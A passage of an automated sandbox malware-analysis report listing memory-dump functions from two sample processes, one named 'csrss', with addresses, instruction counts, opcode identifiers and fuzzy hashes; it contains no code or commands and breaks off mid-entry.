                          • Instruction ID: f0b71b3b44550d51c903d6a1e3b3bf4307da70a9340da995f4796e754319e92e
                          • Opcode Fuzzy Hash: 36310835af553fcfb5f13c6692d8721bea15d4413266a87d0f1700369e44ca6f
                          • Instruction Fuzzy Hash: 7A11AC31A0A68E4FEB59EB6488696BD7BA0FF19300F0505BED459C31B2DAA466408701
                          Function 00007FFD9B772701 Relevance: .1, Instructions: 58COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d993ec16e918c150b0c6e2ff1f7e130d407d24fc7eb7b36986fe1934a710fceb
                          • Instruction ID: 11be7cfea5140e03a5000e357337d8392418f0fd9ff69e0ce5f717c0114dfda1
                          • Opcode Fuzzy Hash: d993ec16e918c150b0c6e2ff1f7e130d407d24fc7eb7b36986fe1934a710fceb
                          • Instruction Fuzzy Hash: 0011C83090A64E8FD752ABB484585F97BF4EF1A304F0505B2E418C7075DA749244C751
                          Function 00007FFD9B7627AD Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42432b1c6630668093b1e9991162c9e7be6327301d6f2b8f267220b4ad572300
                          • Instruction ID: 02a559583b7fa8d8e1e6445f25f5866e0d8c73200f6f666f8dac4fbabb1fc4fc
                          • Opcode Fuzzy Hash: 42432b1c6630668093b1e9991162c9e7be6327301d6f2b8f267220b4ad572300
                          • Instruction Fuzzy Hash: BF118231A0A74ECFEBAD9FA488256B937A0FF15301F41457AE819C61F2DB38A550CB41
                          Function 00007FFD9B7611AD Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7899fcd56a2c0f422d78fce39cc5cd8411ef51eb3c787d32c78122139a0e4e0c
                          • Instruction ID: 83bac54d71f5a30851b6e9430f4a4d1cd54ec11260221c885a997db16f1344c9
                          • Opcode Fuzzy Hash: 7899fcd56a2c0f422d78fce39cc5cd8411ef51eb3c787d32c78122139a0e4e0c
                          • Instruction Fuzzy Hash: B611D031E0A68E8FEB68DBA4886D6BD7BE0EF25301F0111BEC01AC74F1EE256640C701
                          Function 00007FFD9B772E75 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee8b58128e3fbaec349f34fd9d3ac20d9ca468144af75bc6ffad7a4746d755b4
                          • Instruction ID: 6e28f41fc9853849f935c6ef6b18f2456281a128d37081e78d8f2ca4bddadca2
                          • Opcode Fuzzy Hash: ee8b58128e3fbaec349f34fd9d3ac20d9ca468144af75bc6ffad7a4746d755b4
                          • Instruction Fuzzy Hash: 8E117331E0A64E5FE751EBA488AD5B97BF0FF15300F0506B6D41CC3076EA74A6948741
                          Function 00007FFD9B76BB35 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b76a000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c73044660f884899053141475af6a49aea24e75a4eb96d5b8c9be84ba67314ce
                          • Instruction ID: 1001c88f74217c02b2822d71bb8e0565b7f71295994d48eb9b696dbe4332bd38
                          • Opcode Fuzzy Hash: c73044660f884899053141475af6a49aea24e75a4eb96d5b8c9be84ba67314ce
                          • Instruction Fuzzy Hash: 1D117C30A1AA4E8FDB94EFA8C8696BD7BF0FF19301F1105BAD41DC71B6DA35A6408701
                          Function 00007FFD9B762E41 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a0924519acdb921ca80194c2daae3db1090cff7edb9d88063b0c54e1fbccd66
                          • Instruction ID: 7a05fd4f084a89f15016e9300128cd4260dc26281451cf0ee67141722f92b71e
                          • Opcode Fuzzy Hash: 5a0924519acdb921ca80194c2daae3db1090cff7edb9d88063b0c54e1fbccd66
                          • Instruction Fuzzy Hash: 25018831E5A74E9FE7A1ABA4845D5B976E0FF59300F0245B6D408C70B6EE38E6548601
                          Function 00007FFD9B7721C1 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b2a7f5b1aaa351c289d2c99e17e06fe788fa6c4b93ad90d8bb5378d8689b584
                          • Instruction ID: bbdd6d6755449d931007116cb1393063ba131271e10c6622bee67a22a2184a0c
                          • Opcode Fuzzy Hash: 0b2a7f5b1aaa351c289d2c99e17e06fe788fa6c4b93ad90d8bb5378d8689b584
                          • Instruction Fuzzy Hash: 4201D430A0A20E8FDB68EFA4C4A55F97BB0FF16304F1205BED42AC30A2DA75E644C740
                          Function 00007FFD9B762EB9 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90dfc1cf2d75596d1ca8ca6362e375d1098175bc6a3b4571f2434d5b986c3536
                          • Instruction ID: 16bb7a4da8c3979c17876483aaabb4ce6c42c64dd460694cd6cf6383d91bab47
                          • Opcode Fuzzy Hash: 90dfc1cf2d75596d1ca8ca6362e375d1098175bc6a3b4571f2434d5b986c3536
                          • Instruction Fuzzy Hash: 40018431E0E74E9FE791EBB4886D5A93BE0EF55300F5606B2D418C70B6EA28A5448701
                          Function 00007FFD9B777A09 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8506ca279057aa7f228049798f275b21e267c7b00911a131ef08bc43a7fc7dcc
                          • Instruction ID: 73909f6700f2a7729a9f91f2a958c9f4df7be2f22611861df4002c164eba4c05
                          • Opcode Fuzzy Hash: 8506ca279057aa7f228049798f275b21e267c7b00911a131ef08bc43a7fc7dcc
                          • Instruction Fuzzy Hash: 4901C030A0E78E5FEB599B6888A95B93BE0EF15304F1209FAC009C70E2DA75A600C701
                          Function 00007FFD9B76281D Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c46bccee4d68cabb727514bc9a9f3eda2a6b0ebb4732282dfe951e4fb6c93f7f
                          • Instruction ID: 5ad68733a00313b664f07c5583a180ad63150eb9241c152d21cca2c6894e2b3b
                          • Opcode Fuzzy Hash: c46bccee4d68cabb727514bc9a9f3eda2a6b0ebb4732282dfe951e4fb6c93f7f
                          • Instruction Fuzzy Hash: 6C01D831E1A74E8FE791EBA488585A97BE0EF15300F4206B6D408D70B6DA34E1408701
                          Function 00007FFD9B7605D8 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8d9670b8a744bc5f3a08e436d28e60c40ca98853f9583511eadaa3f0e8b2c9b
                          • Instruction ID: 44f36e19fda8624d947f0b09dbbd72f6d2075dd013c86571601eb2e66e5b6025
                          • Opcode Fuzzy Hash: e8d9670b8a744bc5f3a08e436d28e60c40ca98853f9583511eadaa3f0e8b2c9b
                          • Instruction Fuzzy Hash: EB019E30A0960E8EEB58EF64C068ABD37A1EF68304F20057DD40AC25F5DA31A590C741
                          Function 00007FFD9B76A909 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b76a000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 013a9e8f0b8cd1dd9662c74ba7f9f3864f3c3cbb4b0c75e44e75f07eaee96cc3
                          • Instruction ID: 1d0cef03d42c9b293ae2e8239eb2b1ed3585745773c5f39e5549e455c7ab615f
                          • Opcode Fuzzy Hash: 013a9e8f0b8cd1dd9662c74ba7f9f3864f3c3cbb4b0c75e44e75f07eaee96cc3
                          • Instruction Fuzzy Hash: 8D018431A5E78E8FE762EB7488695A97BF0EF56300F1746F2D008C70B2E928A5448702
                          Function 00007FFD9B761C35 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4494e0894d9d8807553970982d44db2d4ff9adb26b2b2ffa2d8916fd575f4886
                          • Instruction ID: 15f0db4b3c0fd8784abb724c7037b4eb838a1429d980947f531e6131b1bd51f7
                          • Opcode Fuzzy Hash: 4494e0894d9d8807553970982d44db2d4ff9adb26b2b2ffa2d8916fd575f4886
                          • Instruction Fuzzy Hash: 6701A230A0A78E8FEB549F6488296BD3BA1EF25300F41117AD408C34F1DA759550C741
                          Function 00007FFD9B772A4D Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 766be16940b49dfa9aa4730a91e12247efa8c58836f5bfd27530b36065ba30c0
                          • Instruction ID: 21302f336e92ff38efdbb0d2a529731d00265a2a43a26ea073c1acd482d8e030
                          • Opcode Fuzzy Hash: 766be16940b49dfa9aa4730a91e12247efa8c58836f5bfd27530b36065ba30c0
                          • Instruction Fuzzy Hash: B701A830E19A1D8EDBA4EB54C8947ADB6B2FB59301F5041A9900DE32A1DE352E81CB01
                          Function 00007FFD9B760608 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2edc9396c66785d79e8505c9a71801c410747bde19f3ad0195389ab8b6cc1596
                          • Instruction ID: 707a1b5fa774a46c6078bd4bf3e0ae672a9a563b6b916969576735a527062fc7
                          • Opcode Fuzzy Hash: 2edc9396c66785d79e8505c9a71801c410747bde19f3ad0195389ab8b6cc1596
                          • Instruction Fuzzy Hash: 0601D130A1560ECFEB9CEBA4C468AB973A0FF18305F10097ED41EC21F0DE35A640CA01
                          Function 00007FFD9B760610 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b72ecf92897133476ddb3674ec82ced50501f22b8d2a185082d46d79a4aeafb3
                          • Instruction ID: c7761cd5e07cef9301a9722001592e2b564efd9c469f5c9f12c3d00168c37972
                          • Opcode Fuzzy Hash: b72ecf92897133476ddb3674ec82ced50501f22b8d2a185082d46d79a4aeafb3
                          • Instruction Fuzzy Hash: 41016D30A1960E9EEB9CEBA4C468AB973E0FF18305F5109BED41EC21F5DE35A650CA11
                          Function 00007FFD9B7605D0 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b36032df388b37858e2be18c0cdcabe5ade9064588bdf5d34505485daca54a55
                          • Instruction ID: d591132e2ef2a00424d7c07936b4dc443f79b169231f55ccc29f622d97cabfe1
                          • Opcode Fuzzy Hash: b36032df388b37858e2be18c0cdcabe5ade9064588bdf5d34505485daca54a55
                          • Instruction Fuzzy Hash: 61F0AF30A0A64ECFEB54AE6494296BE37A0EF15308F11157AE80DC24F1DA35A660CB81
                          Function 00007FFD9B7611C0 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8967e7e9468cff9ea58895af3a8c99f90b8716f5a741a1fadb1184cd2de157e
                          • Instruction ID: 39f65562d2ddaab64e321bfdafe87f96c5f76fc0ec2d521f2b795fbfcab68939
                          • Opcode Fuzzy Hash: e8967e7e9468cff9ea58895af3a8c99f90b8716f5a741a1fadb1184cd2de157e
                          • Instruction Fuzzy Hash: C1F0FF30E0A64E8EEB689BE4886C3FD73E0AF61301F00213AE41EC24F0EE242760C601
                          Function 00007FFD9B762739 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7a4e207e04cd1673adbda1668cb0b38d4ea52942db01a806ed88970e6193f14
                          • Instruction ID: ff8b066a6f03d8ed9e03546d738d1c75962622b2785d84bd581176e31b0cc550
                          • Opcode Fuzzy Hash: f7a4e207e04cd1673adbda1668cb0b38d4ea52942db01a806ed88970e6193f14
                          • Instruction Fuzzy Hash: E2F0C83091E3CD8FD79A9B6088355A93B60BF06300F4505BAD519C60F2DA389504C742
                          Function 00007FFD9B76B044 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b76a000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ccc181d82a23a6129f9ed27b9b47e7273e257613308a48c225e3233d66cc7d1
                          • Instruction ID: ba8c0b781a74351665eb02693938aaf51ca239a3b30c9bac5865edae6a78fa37
                          • Opcode Fuzzy Hash: 3ccc181d82a23a6129f9ed27b9b47e7273e257613308a48c225e3233d66cc7d1
                          • Instruction Fuzzy Hash: 82F03C70A19A1D8FDBA4EB58C495BA9B3B1FF58300F1082E6800DE2165DE305A858F40
                          Function 00007FFD9B76BD0B Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b76a000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef2d425d37b3b47f699fca9679155594fc4d2dbfb3a0eef04c17fac8e058df78
                          • Instruction ID: ad3c0de7c4d4b4f94cf310033566e3deb3659518aa632cfc593d2535253b772a
                          • Opcode Fuzzy Hash: ef2d425d37b3b47f699fca9679155594fc4d2dbfb3a0eef04c17fac8e058df78
                          • Instruction Fuzzy Hash: 17D0E235E0892DCFCF50EBC8D8106ECB3B0FB58300B000122D00DD7261DB2068108B40
                          Function 00007FFD9B77519B Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c7f9bf95d6e3cc6d404c3acbc25c879f5dcf8d8c20ae34cb0d44db3d36dd08b
                          • Instruction ID: b13b7a4d642ad4c124e9629e568b356182dbb88bb914af31bda0be01737f4785
                          • Opcode Fuzzy Hash: 4c7f9bf95d6e3cc6d404c3acbc25c879f5dcf8d8c20ae34cb0d44db3d36dd08b
                          • Instruction Fuzzy Hash: 8DD0C972E16B4E8FDBA0DEA8849D298BBE1FF55301B42012AD40893165DF3124419701

                          Non-executed Functions

                          Function 00007FFD9B771303 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$'$)$/$]
                          • API String ID: 0-2511809083
                          • Opcode ID: 6088145794bb0a77fad69ea87cd852f1c7e7858c93a2e5c333ce06bda2d46705
                          • Instruction ID: ad0f07389d9304cb9324e3e9eb1032ae7f6a2640df7c8b3cc84c86034c8a126a
                          • Opcode Fuzzy Hash: 6088145794bb0a77fad69ea87cd852f1c7e7858c93a2e5c333ce06bda2d46705
                          • Instruction Fuzzy Hash: 9F41B870E0961D8FEB68DF94C8A4BEDB7B1EB58711F1141AAD00EA72A0DA745AC4CF50

                          Executed Functions

                          Function 00007FFD9B783585 Relevance: .3, Instructions: 270COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc7703725c1f465da698d9117ce95042ad3c37b8eabc6946d83ce2fa791711d9
                          • Instruction ID: 05769d719d5d2b48fafb9f51bc0e80f737e94042d8541f1b8fc14e376efc0d85
                          • Opcode Fuzzy Hash: cc7703725c1f465da698d9117ce95042ad3c37b8eabc6946d83ce2fa791711d9
                          • Instruction Fuzzy Hash: 8391D371A18A4D8FEB94DFACC8657AC7BE1EF59315F4002BAE009D72E6DAB428018740
                          Function 00007FFD9B780DDC Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: H$H
                          • API String ID: 0-136785262
                          • Opcode ID: 68c58c9177fddcbd2bea9c0de194290e3e9beb0e5cea43543123eb80671c366c
                          • Instruction ID: 79ae6582371b55172ecc57544a44cb1ec652ee0776b4108d174b4605b1823273
                          • Opcode Fuzzy Hash: 68c58c9177fddcbd2bea9c0de194290e3e9beb0e5cea43543123eb80671c366c
                          • Instruction Fuzzy Hash: BD51B531E0AE0E4EEBA8EF64C8A5BED73A1EF55311F0143B9D00D971B6DE386A458740
                          Function 00007FFD9B7955F2 Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: IR_H
                          • API String ID: 0-3980704332
                          • Opcode ID: 556890684fdd7871e4ec5de642c0bf2536437d56e225101d8b555a9a6af2e229
                          • Instruction ID: bdf006c6db19b5aa1f00d5eac610355b430b5b2350e1507d2d589b40a5f643e7
                          • Opcode Fuzzy Hash: 556890684fdd7871e4ec5de642c0bf2536437d56e225101d8b555a9a6af2e229
                          • Instruction Fuzzy Hash: EEB15932B0DB5A0FD769EB6894B49F93BE1EF55314B0902BBD049C71F7DE18A9058740
                          Function 00007FFD9B781668 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: UAVW
                          • API String ID: 0-3038902782
                          • Opcode ID: 9a3ad3fb88026d1ac829b9734c93dc26d41f9fb34f544734c0ec5135ab849644
                          • Instruction ID: b5adeaf5e6981c4b92e3fd6d3e1fb84c0210b67945d1614535a3744c9d6cdc7c
                          • Opcode Fuzzy Hash: 9a3ad3fb88026d1ac829b9734c93dc26d41f9fb34f544734c0ec5135ab849644
                          • Instruction Fuzzy Hash: 7871CE31B09F494FDB58DE5888A56A977E2FF98301B15027EE45EC36A2DE30AD028781
                          Function 00007FFD9B780D2A Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: H
                          • API String ID: 0-2852464175
                          • Opcode ID: 285720c7d4d980067796a553e46831fc141d897690f1acaf6e1423c96002b255
                          • Instruction ID: 8fc21be7a6420fc929dea04a57608057835c0d23eb8aeeb8e481be468fc26b09
                          • Opcode Fuzzy Hash: 285720c7d4d980067796a553e46831fc141d897690f1acaf6e1423c96002b255
                          • Instruction Fuzzy Hash: 8371A431E0AA0E4FEB68EB64C8A5BED73A2EF55315F0143B9D00D971B6DE346A458B40
                          Function 00007FFD9B781CBD Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: UAVW
                          • API String ID: 0-3038902782
                          • Opcode ID: 38411e247a6d952340297595f2e23321590865e184fcca3efa704c179f525179
                          • Instruction ID: ea5822ac37e13be1510b2e36b9461bed4e0f206773612ef8c30f3db9fa6fe378
                          • Opcode Fuzzy Hash: 38411e247a6d952340297595f2e23321590865e184fcca3efa704c179f525179
                          • Instruction Fuzzy Hash: AE51E431B18B894FDB5CDE1888A56B977E2FF98301F15467ED45EC72A2DE34A802C781
                          Function 00007FFD9B78C6FB Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: _
                          • API String ID: 0-701932520
                          • Opcode ID: e9556308ce274d480ae80723b0ef2b4fd571de39b18620b114fe1dbcddcd01fd
                          • Instruction ID: 0194abf75346102d092a22b2b6b097d3ae96b6e2d9e148570edc0301f3d27875
                          • Opcode Fuzzy Hash: e9556308ce274d480ae80723b0ef2b4fd571de39b18620b114fe1dbcddcd01fd
                          • Instruction Fuzzy Hash: B241243B71961A8ED7147FB8B8510FD7B50EF91332B05027BE519CA0A3DE34644A8BD0
                          Function 00007FFD9B7820D5 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: WVSH
                          • API String ID: 0-4131290416
                          • Opcode ID: 46350ace69322f5118fa84f15240d579951c456659c9a296c9b478dda0bf6183
                          • Instruction ID: bb00576b7b719f67a925386e20167b4a0855af1a6d41bb0a8d030b617e6b27e6
                          • Opcode Fuzzy Hash: 46350ace69322f5118fa84f15240d579951c456659c9a296c9b478dda0bf6183
                          • Instruction Fuzzy Hash: FA413831F0EA4A4FD356DBB884A51B877E1EF86352F1642FAD40CC71B6DE38A9428351
                          Function 00007FFD9B7911FE Relevance: 1.3, Strings: 1, Instructions: 60COMMON
